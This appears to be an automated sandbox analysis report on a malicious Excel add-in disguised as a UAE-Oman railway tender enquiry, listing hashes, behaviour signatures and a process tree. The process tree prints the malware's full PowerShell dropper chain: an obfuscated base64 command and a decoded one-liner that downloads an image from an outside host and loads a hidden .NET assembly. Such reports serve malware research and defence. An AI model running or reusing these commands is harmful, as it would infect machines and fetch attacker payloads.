Analysis

  • max time kernel
    117s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2023 15:28

General

  • Target

    Tender Enquiry UAE-Oman Railway Link Project.xlam

  • Size

    673KB

  • MD5

    6c41c35e408a18d8e2d98eb3df016e87

  • SHA1

    4668e6de0070d0a92c63990099908029e45dd1ab

  • SHA256

    d9d0ce8ddb0663aacfbc594241b9ab4785419baf302563b8b2eb5d2249d963dd

  • SHA512

    db50ac69c927d3a7a2e904e7202a10d46b0fbc2e514444e3a87a44c60ec0380d398d9eda7c9ac239fcf5f2275500c53771a3ce4b8e11fd960849b9140c61c1d9

  • SSDEEP

    12288:HsLFsXoGaZop0qBD5xOQ5A09Fz5eDH/SxJigHkD3D5eeb6p9XjRe:H2sXoNKLNxO94sqzpS3R6v4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750

exe.dropper

https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Tender Enquiry UAE-Oman Railway Link Project.xlam"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1988
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\unxggyus.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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waLiPNSKQmJPKwaLiPNSKQmBlPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBGPKwaLiPNSKQmGwPKwaLiPNSKQmYQBnPKwaLiPNSKQmCkPKwaLiPNSKQmOwPKwaLiPNSKQmkPKwaLiPNSKQmHMPKwaLiPNSKQmdPKwaLiPNSKQmBhPKwaLiPNSKQmHIPKwaLiPNSKQmdPKwaLiPNSKQmBJPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBlPKwaLiPNSKQmHgPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmtPKwaLiPNSKQmGcPKwaLiPNSKQmZQPKwaLiPNSKQmgPKwaLiPNSKQmDPKwaLiPNSKQmPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmtPKwaLiPNSKQmGEPKwaLiPNSKQmbgBkPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmJPKwaLiPNSKQmBlPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBJPKwaLiPNSKQmG4PKwaLiPNSKQmZPKwaLiPNSKQmBlPKwaLiPNSKQmHgPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmtPKwaLiPNSKQmGcPKwaLiPNSKQmdPKwaLiPNSKQmPKwaLiPNSKQmgPKwaLiPNSKQmCQPKwaLiPNSKQmcwB0PKwaLiPNSKQmGEPKwaLiPNSKQmcgB0PKwaLiPNSKQmEkPKwaLiPNSKQmbgBkPKwaLiPNSKQmGUPKwaLiPNSKQmePKwaLiPNSKQmPKwaLiPNSKQm7PKwaLiPNSKQmCQPKwaLiPNSKQmcwB0PKwaLiPNSKQmGEPKwaLiPNSKQmcgB0PKwaLiPNSKQmEkPKwaLiPNSKQmbgBkPKwaLiPNSKQmGUPKwaLiPNSKQmePKwaLiPNSKQmPKwaLiPNSKQmgPKwaLiPNSKQmCsPKwaLiPNSKQmPQPKwaLiPNSKQmgPKwaLiPNSKQmCQPKwaLiPNSKQmcwB0PKwaLiPNSKQmGEPKwaLiPNSKQmcgB0PKwaLiPNSKQmEYPKwaLiPNSKQmbPKwaLiPNSKQmBhPKwaLiPNSKQmGcPKwaLiPNSKQmLgBMPKwaLiPNSKQmGUPKwaLiPNSKQmbgBnPKwaLiPNSKQmHQPKwaLiPNSKQmaPKw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NSKQmBhPKwaLiPNSKQmEEPKwaLiPNSKQmPQPKwaLiPNSKQm9PKwaLiPNSKQmCcPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmsPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmJwBkPKwaLiPNSKQmGYPKwaLiPNSKQmZPKwaLiPNSKQmBmPKwaLiPNSKQmGQPKwaLiPNSKQmJwPKwaLiPNSKQmgPKwaLiPNSKQmCwPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmnPKwaLiPNSKQmGQPKwaLiPNSKQmZgBkPKwaLiPNSKQmGYPKwaLiPNSKQmJwPKwaLiPNSKQmgPKwaLiPNSKQmCwPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmnPKwaLiPNSKQmGQPKwaLiPNSKQmZgBkPKwaLiPNSKQmGYPKwaLiPNSKQmJwPKwaLiPNSKQmgPKwaLiPNSKQmCwPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmnPKwaLiPNSKQmGQPKwaLiPNSKQmYQBkPKwaLiPNSKQmHMPKwaLiPNSKQmYQPKwaLiPNSKQmnPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmLPKwaLiPNSKQmPKwaLiPNSKQmgPKwaLiPNSKQmCcPKwaLiPNSKQmZPKwaLiPNSKQmBlPKwaLiPNSKQmCcPKwaLiPNSKQmIPKwaLiPNSKQmPKwaLiPNSKQmsPKwaLiPNSKQmCPKwaLiPNSKQmPKwaLiPNSKQmJwBjPKwaLiPNSKQmHUPKwaLiPNSKQmJwPKwaLiPNSKQmpPKwaLiPNSKQmCkPKwaLiPNSKQm';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PKwaLiPNSKQm','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnJvZmduL3l0aXNhdi9wb3QueW9jaXRpdXFlLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1828

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    e2c45d3d900d04171ee57f2464cc8b9e

    SHA1

    7ff9cc25dc9a218fd9b38378474e537ecde40ab9

    SHA256

    136950fc2decb55f56e1d164ab4028a7b0145d49ec31efde3b8ac35a68e27d06

    SHA512

    930d86ad84bf5eda7ecd4364c5aa2687eca6409a70f1e3efd7536515ce90c6ed5b48cb7a5cd102602c0264726484ad13cefc8c551275a48a18776a9c278cc9f6

  • C:\Users\Admin\AppData\Local\Temp\Cab4404.tmp

    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

  • C:\Users\Admin\AppData\Local\Temp\Tar44E2.tmp

    Filesize

    163KB

    MD5

    9441737383d21192400eca82fda910ec

    SHA1

    725e0d606a4fc9ba44aa8ffde65bed15e65367e4

    SHA256

    bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

    SHA512

    7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IATN24AJLXP128MO03WI.temp

    Filesize

